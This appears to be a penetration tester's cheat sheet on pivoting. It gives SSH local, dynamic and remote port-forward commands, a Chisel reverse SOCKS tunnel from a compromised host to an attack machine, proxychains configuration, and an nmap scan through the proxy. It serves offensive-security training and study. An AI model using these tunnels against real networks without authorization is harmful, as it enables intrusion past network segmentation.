## SSH Port Forwarding
###### SSH Local Port Forward
`ssh -L -N <local-listener-port>:<target-ip>:<remote-port> username@remotehost`
###### SSH Dynamic Port Forward
`ssh -D <local-port> username@remotehost`
**Note:** From here, access any other port on any other host that 'remotehost' has access to through that single port. This means that if we have set up a dynamic port forward from a compromised machine to a second compromised machine that has further access, our original attack machine can access the specified `<local-port>` using [[#SSH Dynamic Port Forward|proxychains]].
###### SSH Remote Port Forward
`ssh -N -R 127.0.0.1:<local-listener-port>:<target-ip>:<remote-port> kali@<your-ip>`
**Note:** This connection is made from an intermediary machine, between the attack machine and the target machine but with routes to both. The attack machine can then access the remote target port through the local IP and listener port.
###### SSH Remote Dynamic Port Forward
`ssh -N -R <proxy-port> kali@<your-ip>`
This initiates a reverse connection and binds a SOCKS proxy port to the local interface on the attack machine. Configure [[#Remote Dynamic Port Forward Proxy|proxychains]] to forward traffic through the proxy and access remote targets that are routable by the intermediary machine.

---
## Chisel
###### Set up Chisel Server
`chisel server --port <listener-port> --reverse`
###### Check Proxy Status
`sudo ss -ntplu`
**Note:** Identify the local port here for adding to the [[#Remote Dynamic Port Forward Proxy|proxychains]] config. Use the Remote Dynamic example.
###### Execute Chisel on Client
`./chisel client <attack-ip>:<listener-port> R:socks`
###### Execute Commands via the Proxy
`proxychains ssh <user>@<remote-ip>`

---
## SOCKS Proxy
Modify the SOCKS proxy to point at the port you want:
`nano /etc/proxychains4.conf`
###### Dynamic Port Forward Proxy
`socks5 192.168.188.63 9999` 
###### Remote Dynamic Port Forward Proxy
`socks5 127.0.0.1 9998`
**Note:**  Run your tool with proxychains in front of it to send all traffic through that port instead:
`proxychains nmap -sT 172.168.188.63` Where 172.168.188.63 is a machine that can only be reached through your intermediary proxy.